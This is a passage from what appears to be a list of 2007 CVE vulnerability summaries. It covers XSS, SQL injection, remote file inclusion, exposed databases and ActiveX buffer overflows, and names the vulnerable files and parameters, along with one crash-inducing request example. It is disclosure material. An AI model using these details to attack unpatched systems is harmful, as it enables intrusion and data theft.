(XSS) vulnerability in index.php in phpTrafficA 1.4.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the lang parameter. [CVE-2007-3424] The moveim function in cgi-bin/cgi-lib/instantmessage.pl in web-app.org WebAPP before 0.9.9.7 uses the tocat parameter as a subdirectory name when moving an instant message, which has unknown impact and remote attack vectors. [CVE-2007-3423] cgi-bin/cgi-lib/instantmessage.pl in web-app.org WebAPP before 0.9.9.7 uses the From field of an instant message as the beginning of the .dat file name when the (1) imview2 or (2) imview3 function reads (a) an internal IM, or a message from a (b) guest or (c) removed member, which has unknown impact and remote attack vectors. [CVE-2007-3422] The getcgi function in cgi-bin/cgi-lib/subs.pl in web-app.org WebAPP before 0.9.9.7 attempts to parse query strings that contain (1) non-printing characters, (2) certain printing characters that do not commonly occur in URLs, or (3) invalid URL encoding sequences, which has unknown impact and remote attack vectors. [CVE-2007-3421] The (1) login, (2) admin profile edit, (3) reminder, (4) edit profile, (5) profile view, (6) gallery view, (7) gallery comment, and (8) gallery feedback capabilities in web-app.org WebAPP before 0.9.9.7 do not verify presence of users in memberlist.dat, which has unknown impact and remote attack vectors. [CVE-2007-3420] The Random Cookie Password functionality in the loaduser function in cgi-bin/cgi-lib/subs.pl in web-app.org WebAPP before 0.9.9.7 does not clear the (1) username, (2) password, (3) usertheme, and (4) userlang cookies for unauthorized users, which has unknown impact and remote attack vectors. [CVE-2007-3419] The editprofile3 function in cgi-bin/cgi-lib/user.pl in web-app.org WebAPP before 0.9.9.7 does not properly check the (1) themes.dat, (2) languages.dat, (3) profession.dat, (4) gen.dat, (5) marstat.dat, (6) states.dat, and (7) ages.dat files before saving profile settings of members, which has unknown impact and remote attack vectors. [CVE-2007-3418] The displaypost function in cgi-bin/cgi-lib/forum_display.pl in web-app.org WebAPP before 0.9.9.7 does not display usernames in conjunction with real names, which makes it easier for remote authenticated users to impersonate other users. [CVE-2007-3417] Multiple cross-site scripting (XSS) vulnerabilities in cgi-bin/cgi-lib/search.pl in web-app.org WebAPP before 0.9.9.7 allow remote attackers to inject arbitrary web script or HTML via a search string, which is not sanitized when an HREF attribute is printed by the (1) process_search or (2) show_recent_searches function. [CVE-2007-3416] Multiple cross-site request forgery (CSRF) vulnerabilities in the administration of (1) polls, (2) profiles, (3) IP bans, and (4) forums in (a) web-app.org WebAPP 0.8 through 0.9.9.6 [CVE-2007-3414] Multiple cross-site scripting (XSS) vulnerabilities in access2asp 4.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) od and (2) search parameters to (a) suppliersList.asp and (b) contactsList.asp. [CVE-2007-3413] Multiple cross-site scripting (XSS) vulnerabilities in bosDataGrid 2.50 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) GridSearch, (2) gsearch, or (3) ParentID parameter to an unspecified component. [CVE-2007-3412] Cross-site scripting (XSS) vulnerability in edit_image.asp in ClickGallery Server 5.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the from parameter. [CVE-2007-3405] Multiple cross-site scripting (XSS) vulnerabilities in defter_yaz.asp in Lebisoft zdefter 4.0 allow remote attackers to inject arbitrary web script or HTML via the (1) ad and (2) konu parameters. NOTE: the provenance of this information is unknown [CVE-2007-3398] LiteWEB 2.7 allows remote attackers to cause a denial of service (hang) via a large number of requests for nonexistent pages. [CVE-2007-3397] The web container in IBM WebSphere Application Server (WAS) before 6.0.2.21, and 6.1.x before 6.1.0.9, sends response data intended for a different request in certain circumstances after a closed connection error, which might allow remote attackers to obtain sensitive information. [CVE-2007-3396] Cross-site scripting (XSS) vulnerability in index.wkf in KeyFocus (KF) web server 3.1.0 allows remote attackers to inject arbitrary web script or HTML via the opsubmenu parameter. [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action. [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages. [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages. [CVE-2007-3366] Cross-site scripting (XSS) vulnerability in Simple CGI Wrapper (scgiwrap) in cPanel before 10.9.1, and 11.x before 11.4.19-R14378, allows remote attackers to inject arbitrary web script or HTML via the URI. NOTE: the provenance of this information is unknown [CVE-2007-3364] Cross-site scripting (XSS) vulnerability in the cgi-bin/post.mscgi sample page in MyServer 0.8.9 allows remote attackers to inject arbitrary web script or HTML via the body content. [CVE-2007-3359] Multiple PHP remote file inclusion vulnerabilities in SerWeb 0.9.6 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the _SERWEB[serwebdir] parameter to (1) html/load_apu.php or (2) html/mail_prepend.php. NOTE: the provenance of this information is unknown [CVE-2007-3358] PHP remote file inclusion vulnerability in html/load_lang.php in SerWeb 0.9.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the _SERWEB[serwebdir] parameter. [CVE-2007-3355] Multiple cross-site scripting (XSS) vulnerabilities in NetClassifieds Premium Edition allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3352] Cross-site scripting (XSS) vulnerability in the preview form in Stephen Ostermiller Contact Form before 2.00.02 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors that contain an apostrophe. [CVE-2007-3344] Multiple cross-site scripting (XSS) vulnerabilities in netjukebox 4.01b allow remote attackers to inject arbitrary web script or HTML via the (1) album_id, (2) order, (3) sort, (4) filter, and (5) genre_id parameters to (a) index.php [CVE-2007-3343] Cross-site scripting (XSS) vulnerability in RaidenHTTPD before 2.0.14 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3342] Multiple cross-site scripting (XSS) vulnerabilities in Movable Type (MT) before 3.34 allow remote attackers to inject arbitrary web script or HTML via comments that have (1) a malformed SGML numeric character reference with a '\0' (0x00) character in a javascript: URI or (2) an attribute in an element that lacks the '>' character at the end of the start tag, a different vulnerability than CVE-2007-0231. [CVE-2007-3339] Multiple cross-site scripting (XSS) vulnerabilities in forum/include/error/autherror.cfm in FuseTalk Basic, Standard, Enterprise, and ColdFusion allow remote attackers to inject arbitrary web script or HTML via the (1) FTVAR_LINKP and (2) FTVAR_URLP parameters to (a) forum/include/error/autherror.cfm, and the (3) FTVAR_SCRIPTRUN parameter to (b) forum/include/common/comfinish.cfm and (c) blog/include/common/comfinish.cfm. [CVE-2007-3330] Cross-site scripting (XSS) vulnerability in STphp EasyNews PRO 4.0 allows remote attackers to inject arbitrary web script or HTML via a news post, which is stored in news/ without sanitization. [CVE-2007-3328] Multiple cross-site scripting (XSS) vulnerabilities in Interact 2.4 beta 1 allow remote attackers to inject arbitrary web script or HTML via the (1) module_key parameter to (a) kb/kb.php, (b) quiz/runquiz.php, (c) quiz/quiz.php, (d) forum/forum.php, (e) forum/byname.php, and (f) journal/journalview.php in modules/, and unspecified other scripts [CVE-2007-3324] Multiple cross-site scripting (XSS) vulnerabilities in Comersus Cart 7.07 allow remote attackers to inject arbitrary web script or HTML via the redirectUrl parameter to (1) comersus_customerAuthenticateForm.asp or (2) comersus_message.asp, different vectors than CVE-2004-0681. [CVE-2007-3310] Cross-site scripting (XSS) vulnerability in arama.asp in TDizin allows remote attackers to inject arbitrary web script or HTML via the ara parameter. NOTE: the provenance of this information is unknown [CVE-2007-3299] Cross-site scripting (XSS) vulnerability in AWFFull before 3.7.4, when AllSearchStr (aka the All Search Terms report) is enabled, allows remote attackers to inject arbitrary web script or HTML via a search string. [CVE-2007-3296] The ThunderServer.webThunder.1 ActiveX control in xunlei Web Thunderbolt 1.7.3.109 allows remote attackers to download arbitrary files and conduct other unauthorized actions by invoking dangerous methods. [CVE-2007-3291] Cross-site scripting (XSS) vulnerability in LiveCMS 3.4 and earlier allows remote attackers to inject arbitrary web script or HTML via an article name, possibly involving the titulo parameter in article.php. [CVE-2007-3288] Cross-site scripting (XSS) vulnerability in the skeltoac stats (Automattic Stats) 1.0 plugin for WordPress allows remote attackers to inject arbitrary web script or HTML via the HTTP Referer field. [CVE-2007-3281] Cross-site scripting (XSS) vulnerability in index.php in Php Hosting Biller 1.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2007-3276] Cross-site scripting (XSS) vulnerability in index.php in Site@School (S@S) 2.4.10 allows remote attackers to inject arbitrary web script or HTML via the q parameter. NOTE: the provenance of this information is unknown [CVE-2007-3269] Multiple cross-site scripting (XSS) vulnerabilities in Papoo Light 3.6 before 20070611 allow remote attackers to inject arbitrary web script or HTML via (1) the URI in a GET request or (2) the Title field of a visitor comment, and (3) allow remote authenticated users to inject arbitrary web script or HTML via a message to another user. NOTE: vector (2) might overlap CVE-2006-3571.1. [CVE-2007-3267] Cross-site scripting (XSS) vulnerability in low.php in Fuzzylime Forum 1.01b and earlier allows remote attackers to inject arbitrary web script or HTML via the fromaction parameter in a log action, a different vector than CVE-2007-3235. [CVE-2007-3266] Directory traversal vulnerability in webif.cgi in ifnet WEBIF allows remote attackers to include and execute arbitrary local files a .. (dot dot) in the outconfig parameter. [CVE-2007-3265] Cross-site scripting (XSS) vulnerability in the Samples component in IBM WebSphere Application Server (WAS) 6.1.0.7 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3264] Unspecified vulnerability in the PD tools component in IBM WebSphere Application Server (WAS) 6.1.0.7 and earlier has unknown impact and attack vectors. [CVE-2007-3262] Unspecified vulnerability in the Default Messaging Component in IBM WebSphere Application Server (WAS) 6.1.0.7 and earlier allows remote attackers to cause a denial of service related to a thread hang, and possibly related to a "TCP issue," or to MPAlarmThread and a resultant memory leak. [CVE-2007-3261] Cross-site scripting (XSS) vulnerability in widgets/widget_search.php in dKret before 2.6 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO (PHP_SELF). [CVE-2007-3256] Xythos Enterprise Document Manager (XEDM), Digital Locker (XDL), and possibly WebFile Server before 6.0.46.1 allow remote authenticated users to associate arbitrary Content-Type HTTP headers with documents, which might facilitate malware distribution. [CVE-2007-3255] Multiple cross-site request forgery (CSRF) vulnerabilities in Xythos Enterprise Document Manager (XEDM) before 5.0.25.8, and 6.x before 6.0.46.1, allow remote authenticated users to execute commands as arbitrary users via (1) a saved Workflow name or (2) the Content-Type HTTP header. NOTE: item 2 also affects the same version numbers of Xythos Digital Locker (XDL). One or both vectors might also affect Xythos WebFile Server. [CVE-2007-3254] Multiple cross-site scripting (XSS) vulnerabilities in Xythos Enterprise Document Manager (XEDM) before 5.0.25.8, and 6.x before 6.0.46.1, allow remote authenticated users to inject arbitrary web script or HTML via (1) a saved Workflow name [CVE-2007-3252] PortalApp stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for 8691.mdb, a different vector than CVE-2004-1786. [CVE-2007-3249] Cross-site scripting (XSS) vulnerability in mod_lettermansubscribe.php in the Letterman Subscriber (mod_letterman) before 1.2.5 module for Joomla! allows remote attackers to inject arbitrary web script or HTML via the Itemid parameter. [CVE-2007-3248] Unspecified vulnerability in Sun Solaris 10 before 20070614, when IPv6 interfaces are present but not configured for IPsec, allows remote attackers to cause a denial of service (system crash) via certain network traffic. [CVE-2007-3243] Cross-site scripting (XSS) vulnerability in bb-login.php in bbPress 0.8.1 allows remote attackers to inject arbitrary web script or HTML via the re parameter. NOTE: exploitation may require forcing the client to send a certain Referer header. [CVE-2007-3242] The Menu Manager Mod for (1) web-app.net WebAPP (aka WebAPP NE) 0.9.9.3.3 through 0.9.9.8, and (2) web-app.org WebAPP before 0.9.9.6, allows remote authenticated users to execute arbitrary commands via shell metacharacters in the titles of items in a personal menu. [CVE-2007-3241] Cross-site scripting (XSS) vulnerability in blogroll.php in the cordobo-green-park theme for WordPress allows remote attackers to inject arbitrary web script or HTML via the PHP_SELF portion of a URI. [CVE-2007-3240] Cross-site scripting (XSS) vulnerability in 404.php in the Vistered-Little theme for WordPress allows remote attackers to inject arbitrary web script or HTML via the URI (REQUEST_URI) that accesses index.php. NOTE: this can be leveraged for PHP code execution in an administrative session. [CVE-2007-3239] Cross-site scripting (XSS) vulnerability in searchform.php in the AndyBlue theme before 20070607 for WordPress allows remote attackers to inject arbitrary web script or HTML via the PHP_SELF portion of a URI to index.php. NOTE: this can be leveraged for PHP code execution in an administrative session. [CVE-2007-3238] Cross-site scripting (XSS) vulnerability in functions.php in the default theme in WordPress 2.2 allows remote authenticated administrators to inject arbitrary web script or HTML via the PATH_INFO (REQUEST_URI) to wp-admin/themes.php, a different vulnerability than CVE-2007-1622. NOTE: this might not cross privilege boundaries in some configurations, since the Administrator role has the unfiltered_html capability. [CVE-2007-3235] Cross-site scripting (XSS) vulnerability in low.php in Fuzzylime Forum 1.0 allows remote attackers to inject arbitrary web script or HTML via the topic parameter. NOTE: this might be resultant from SQL injection. [CVE-2007-3227] Cross-site scripting (XSS) vulnerability in the to_json (ActiveRecord::Base#to_json) function in Ruby on Rails before edge 9606 allows remote attackers to inject arbitrary web script via the input values. [CVE-2007-3226] Cross-site scripting (XSS) vulnerability in dotProject before 2.1 RC2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2006-2851 and CVE-2006-3240. [CVE-2007-3218] Cross-site scripting (XSS) vulnerability in request.php in PHP Live! 3.2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the pagex parameter. [CVE-2007-3213] Multiple cross-site scripting (XSS) vulnerabilities in comments.cgi in Sporum Forum 3.0.9 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) view and (2) mode parameters. [CVE-2007-3212] Multiple cross-site scripting (XSS) vulnerabilities in links.php in Beehive Forum 0.7.1 allow remote attackers to inject arbitrary web script or HTML via the (1) viewmode, (2) fid, and (3) sort_dir parameters, different vectors than CVE-2005-4460. [CVE-2007-3211] Cross-site scripting (XSS) vulnerability in 404.php in Domain Technologie Control (DTC) before 0.25.9 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO (REQUEST_URI). NOTE: the provenance of this information is unknown [CVE-2007-3202] Cross-site scripting (XSS) vulnerability in the rich text editor in Webwiz allows remote attackers to inject arbitrary web script or HTML via URL-encoded HTML composed of a frameset in which a frame has a SRC attribute pointing to a JavaScript document. [CVE-2007-3198] Cross-site scripting (XSS) vulnerability in comments.php in Maran PHP Blog (Maran Blog), possibly only versions before 20070610, allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2007-3195] Cross-site scripting (XSS) vulnerability in index.php in ERFAN WIKI 1.00 allows remote attackers to inject arbitrary web script or HTML via the title parameter. NOTE: the provenance of this information is unknown [CVE-2007-3189] Cross-site scripting (XSS) vulnerability in auth.php in Just For Fun Network Management System (JFFNMS) 0.8.3 allows remote attackers to inject arbitrary web script or HTML via the user parameter. [CVE-2007-3182] Multiple cross-site scripting (XSS) vulnerabilities in Calendarix 0.7.20070307, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) year and (2) month parameters to calendar.php, and the (3) leftfooter parameter to cal_footer.inc.php. NOTE: the ycyear parameter to yearcal.php is already covered by CVE-2006-1835. [CVE-2007-3178] Multiple SQL injection vulnerabilities in Zindizayn Okul Web Sistemi 1.0 allow remote attackers to execute arbitrary SQL commands via the (1) id or (2) pass parameter to (a) mezungiris.asp or (b) ogretmenkontrol.asp. [CVE-2007-3174] Cross-site scripting (XSS) vulnerability in auth.w2b in W2B Online Banking allows remote attackers to inject arbitrary web script or HTML via the adtype parameter, a different vector than CVE-2006-1980. [CVE-2007-3172] Directory traversal vulnerability in demo/pop3/error.php in Uebimiau Webmail allows remote attackers to determine the existence of arbitrary directories via an absolute pathname and .. (dot dot) in the selected_theme parameter. [CVE-2007-3171] Uebimiau Webmail allows remote attackers to obtain sensitive information via a request to demo/pop3/error.php with an invalid value of the (1) smarty or (2) selected_theme parameter, which reveals the path in various error messages. [CVE-2007-3170] Multiple cross-site scripting (XSS) vulnerabilities in Uebimiau Webmail allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO to redirect.php or (2) the selected_theme parameter to demo/pop3/error.php. [CVE-2007-3164] Microsoft Internet Explorer 7, when prompting for HTTP Basic Authentication for an IDN web site, uses ACE labels for the domain name in the status bar, but uses internationalized labels for this name in the authentication dialog, which might allow remote attackers to perform phishing attacks if the user misinterprets confusable characters in the internationalized labels, as demonstrated by displaying xn--theshmogroup-bgk.com only in the status bar. [CVE-2007-3159] http.c in MiniWeb Http Server 0.8.x allows remote attackers to cause a denial of service (application crash) via a negative value in the Content-Length HTTP header. [CVE-2007-3156] Multiple cross-site scripting (XSS) vulnerabilities in pam_login.cgi in Webmin before 1.350 and Usermin before 1.280 allow remote attackers to inject arbitrary web script or HTML via the (1) cid, (2) message, or (3) question parameter. NOTE: some of these details are obtained from third party information. [CVE-2007-3148] Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method. [CVE-2007-3147] Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information. [CVE-2007-3146] Zen Help Desk 2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing a password via a direct request for ZenHelpDesk.mdb. [CVE-2007-3141] PHP remote file inclusion vulnerability in core/editor.php in phpWebThings 1.5.2 allows remote attackers to execute arbitrary PHP code via a URL in the editor_insert_top parameter. NOTE: the editor_insert_bottom vector is already covered by CVE-2006-6042. [CVE-2007-3137] Multiple cross-site scripting (XSS) vulnerabilities in 4print.asp in WmsCMS 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) sbl, (2) sbr, or (3) search parameter. NOTE: the original disclosure claims the pageid parameter in index.php is affected, but this is incorrect. [CVE-2007-3135] Cross-site scripting (XSS) vulnerability in atomPhotoBlog.php in Atom Photoblog 1.0.9 and earlier allows remote attackers to inject arbitrary web script or HTML via the tag parameter. [CVE-2007-3134] Multiple cross-site scripting (XSS) vulnerabilities in atomPhotoBlog.php in Atom PhotoBlog 1.0.9 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) Your Name, (2) Your Homepage, and (3) Your Comment fields, when using "Approve Comments." [CVE-2007-3133] SQL injection vulnerability in urunbak.asp in W1L3D4 WEBmarket 0.1 allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2007-3131] Cross-site scripting (XSS) vulnerability in add_comment.php in Light Blog 4.1 before 20070606 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2007-3129] Cross-site scripting (XSS) vulnerability in login.php in Utopia News Pro 1.4.0 allows remote attackers to inject arbitrary web script or HTML via the password parameter. [CVE-2007-3120] Cross-site scripting (XSS) vulnerability in public/code/cp_dpage.php in All In One Control Panel (AIOCP) before 1.3.017 allows remote attackers to inject arbitrary web script or HTML via the aiocp_dp parameter. NOTE: some of these details are obtained from third party information. [CVE-2007-3117] Cross-site scripting (XSS) vulnerability in the SEO module in ADPLAN 3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to HTTP headers. [CVE-2007-3110] Cross-site scripting (XSS) vulnerability in the Andy Frank Beatnik 1.0 extension for Firefox allows remote attackers to inject arbitrary web script or HTML via an RSS feed. NOTE: the provenance of this information is unknown [CVE-2007-3109] The CERN Image Map Dispatcher (htimage.exe) in Microsoft FrontPage allows remote attackers to determine the existence, and possibly partial contents, of arbitrary files under the web root via a relative pathname in the PATH_INFO. [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client. [CVE-2007-3099] usr/mgmt_ipc.c in iscsid in open-iscsi (iscsi-initiator-utils) before 2.0-865 checks the client's UID on the listening AF_LOCAL socket instead of the new connection, which allows remote attackers to access the management interface and cause a denial of service (iscsid exit or iSCSI connection loss). [CVE-2007-3084] PHP remote file inclusion vulnerability in sampleblogger.php in Comdev Web Blogger 4.1 allows remote attackers to execute arbitrary PHP code via a URL in the path[docroot] parameter, a different vector than CVE-2006-5441. [CVE-2007-3083] Z-Blog 1.7 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for zblog.mdb. [CVE-2007-3078] Multiple cross-site scripting (XSS) vulnerabilities in Aigaion before 1.3.3 allow remote attackers to inject arbitrary web script or HTML via the title parameter (Authors and Publication titles) to (1) authoractions.php or (2) publicationactions.php. [CVE-2007-3071] Buffer overflow in the GetWebStoreURL function in a certain ActiveX control in eSellerateControl365.dll 3.6.5.0 in eSellerate SDK allows user-assisted remote attackers to execute arbitrary code via a long first argument. [CVE-2007-3070] Cross-site scripting (XSS) vulnerability in index.php in BDigital Web Solutions WebStudio allows remote attackers to inject arbitrary web script or HTML via the pageid parameter. [CVE-2007-3067] Cross-site scripting (XSS) vulnerability in the Attunement and Key Tracker 0.95 and earlier plugin for EQdkp allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly involving the (1) keyshow, (2) sortkey, and (3) show parameters to index.php. [CVE-2007-3064] Cross-site scripting (XSS) vulnerability in diary.php in My Databook allows remote attackers to inject arbitrary web script or HTML via the year parameter. [CVE-2007-3062] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) before 2.1.2 running on Linux and Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3061] Cactushop 6 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for (1) cactushop6.mdb or (2) cactushop5.mdb. [CVE-2007-3060] Multiple cross-site scripting (XSS) vulnerabilities in PHP Live! 3.2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) sid parameter to (a) chat.php, (2) LANG[DEFAULT_BRANDING] and (3) PHPLIVE_VERSION parameters to (b) help.php, the (4) admin[name] parameter to (c) admin/header.php, and the (5) BASE_URL parameter to (d) super/info.php, and in some cases, the LANG[DEFAULT_BRANDING], PHPLIVE_VERSION, and (6) nav_line parameters to setup/footer.php, different vectors than CVE-2006-6769. [CVE-2007-3058] Multiple PHP remote file inclusion vulnerabilities in Madirish Webmail 2.0 allow remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[basedir] parameter to (1) calendar.php, (2) compose.php, and (3) index.php, different vectors than CVE-2007-2826. NOTE: the provenance of this information is unknown [CVE-2007-3056] Cross-site scripting (XSS) vulnerability in filedetails.php in WebSVN 2.0rc4, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the path parameter. [CVE-2007-3055] Cross-site scripting (XSS) vulnerability in index.php in Codelib Linker 2.0.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the cat parameter. [CVE-2007-3054] Cross-site scripting (XSS) vulnerability in search.php in Codelib Linker 2.0.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the kword parameter. NOTE: the provenance of this information is unknown [CVE-2007-3053] Session fixation vulnerability in Calimero.CMS 3.3.1232 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID parameter. [CVE-2007-3050] Session fixation vulnerability in chameleon cms 3.0 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID parameter. [CVE-2007-3049] Cross-site scripting (XSS) vulnerability in index.php in Buttercup web file manager (BWFM) May 2007 allows remote attackers to inject arbitrary web script or HTML via the title parameter. [CVE-2007-3043] Cross-site scripting (XSS) vulnerability in Collaboration - File Sharing 01-20 up to 01-20-/B and 01-30 up to 01-30-/B in Hitachi Groupmax Collaboration Portal up to 07-30-/D, Groupmax Collaboration Web Client - Forum/File Sharing up to 07-30-/C, uCosminexus Collaboration Portal up to 06-30-/D, and uCosminexus Collaboration Portal - Forum/File Sharing up to 06-30-/C on Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3042] Cross-site scripting (XSS) vulnerability in Meneame before 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3038] The Teredo interface in Microsoft Windows Vista and Vista x64 Edition does not properly handle certain network traffic, which allows remote attackers to bypass firewall blocking rules and obtain sensitive information via crafted IPv6 traffic, aka "Windows Vista Firewall Blocking Rule Information Disclosure Vulnerability." [CVE-2007-3018] activeWeb contentserver CMS before 5.6.2964 does not limit the file-creation ability of editors who have restricted accounts, which allows these editors to create files in arbitrary directories. [CVE-2007-3017] The WYSIWYG editor applet in activeWeb contentserver CMS before 5.6.2964 only filters malicious tags from articles sent to admin/applets/wysiwyg/rendereditor.asp, which allows remote authenticated users to inject arbitrary JavaScript via a request to admin/worklist/worklist_edit.asp. [CVE-2007-3014] Multiple cross-site scripting (XSS) vulnerabilities in activeWeb contentserver before 5.6.2964 allow remote attackers to inject arbitrary web script or HTML via the msg parameter to (1) errors/rights.asp or (2) errors/transaction.asp, or (3) the name of a MIME type (mimetype). [CVE-2007-3013] SQL injection vulnerability in activeWeb contentserver before 5.6.2964 allows remote authenticated users with edit permission to execute arbitrary SQL commands via the id parameter to admin/picture/picture_real_edit.asp, and probably other unspecified vectors. [CVE-2007-3009] Format string vulnerability in the MprLogToFile::logEvent function in Mbedthis AppWeb 2.0.5-4, when the build supports logging but the configuration disables logging, allows remote attackers to cause a denial of service (daemon crash) via format string specifiers in the HTTP scheme, as demonstrated by a "GET %n://localhost:80/" request. [CVE-2007-3008] Mbedthis AppWeb before 2.2.2 enables the HTTP TRACE method, which has unspecified impact probably related to remote information leaks and cross-site tracing (XST) attacks, a related issue to CVE-2004-2320 and CVE-2005-3398. [CVE-2007-3001] Multiple cross-site scripting (XSS) vulnerabilities in PHP JackKnife (PHPJK) allow remote attackers to inject arbitrary web script or HTML via (1) the sUName parameter to UserArea/Authenticate.php, (2) the sAccountUnq parameter to UserArea/NewAccounts/index.php, or the (3) iCategoryUnq, (4) iDBLoc, (5) iTtlNumItems, (6) iNumPerPage, or (7) sSort parameter to G_Display.php, different vectors than CVE-2005-4239. [CVE-2007-2997] DISPUTED Multiple SQL injection vulnerabilities in cgi-bin/reorder2.asp in SalesCart Shopping Cart allow remote attackers to execute arbitrary SQL commands via the password field and other unspecified vectors. NOTE: the vendor disputes this issue, stating "We were able to reproduce this sql injection on an old out-of-date demo on the website but not on the released product." [CVE-2007-2995] Unspecified vulnerability in sysmgt.websm.rte in IBM AIX 5.2.0 and 5.3.0 has unknown impact and attack vectors. [CVE-2007-2993] Multiple cross-site scripting (XSS) vulnerabilities in OmegaMw7.asp in OMEGA (aka Omegasoft) INterneSErvicesLosungen (INSEL) allow remote attackers to inject arbitrary web script or HTML via (1) user-created text fields [CVE-2007-2991] Cross-site scripting (XSS) vulnerability in includes/send.inc.php in Evenzia CMS allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2007-2988] A certain admin script in Inout Meta Search Engine sends a redirect to the web browser but does not exit when administrative credentials are missing, which allows remote attackers to inject arbitrary PHP code, as demonstrated by a request to admin/create_engine.php followed by a request to admin/generate_tabs.php. [CVE-2007-2983] Multiple buffer overflows in the British Telecommunications Consumer webhelper ActiveX control before 2.0.0.8 in btwebcontrol.dll allow remote attackers to execute arbitrary code via unspecified vectors. [CVE-2007-2982] Multiple buffer overflows in the British Telecommunications Business Connect webhelper ActiveX control before 1.0.0.7 in btbconnectwebcontrol.dll allow remote attackers to execute arbitrary code via unspecified vectors. [CVE-2007-2979] Techno Dreams Web Directory / Search Engine 2.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for Database.mdb. [CVE-2007-2978] Session fixation vulnerability in eggblog 3.1.0 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID parameter. [CVE-2007-2975] The admin console in Ignite Realtime Openfire 3.3.0 and earlier (formerly Wildfire) does not properly specify a filter mapping in web.xml, which allows remote attackers to gain privileges and execute arbitrary code by accessing functionality that is exposed through DWR, as demonstrated using the downloader. [CVE-2007-2970] Multiple cross-site scripting (XSS) vulnerabilities in cgi/block.cgi in 8e6 R3000 Internet Filter allow remote attackers to inject arbitrary web script or HTML via the (1) URL, (2) CAT, and (3) USER parameters. NOTE: the provenance of this information is unknown [CVE-2007-2968] Cross-site scripting (XSS) vulnerability in register.php in cpCommerce 1.1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the name parameter (Full Name field). [CVE-2007-2963] Multiple cross-site scripting (XSS) vulnerabilities in Invision Power Board (IPB or IP.Board) 2.2.2, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via (1) module_bbcodeloader.php, (2) module_div.php, (3) module_email.php, (4) module_image.php, (5) module_link.php, or (6) the editorid parameter to module_table.php in jscripts/folder_rte_files/. NOTE: some details were obtained from third party sources. [CVE-2007-2962] Cross-site scripting (XSS) vulnerability in search.php in Particle Gallery 1.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the order parameter. [CVE-2007-2945] RMForum stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for rmforum.mdb. [CVE-2007-2944] WabCMS 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/wabcmsn.mdb. NOTE: this issue was originally reported for "webCMS," but this was an error by an unreliable researcher. [CVE-2007-2943] PHP remote file inclusion vulnerability in class/class.php in Webavis 0.1.1 allows remote attackers to execute arbitrary PHP code via a URL in the root parameter. [CVE-2007-2932] Cross-site scripting (XSS) vulnerability in index.php in BoastMachine allows remote attackers to inject arbitrary web 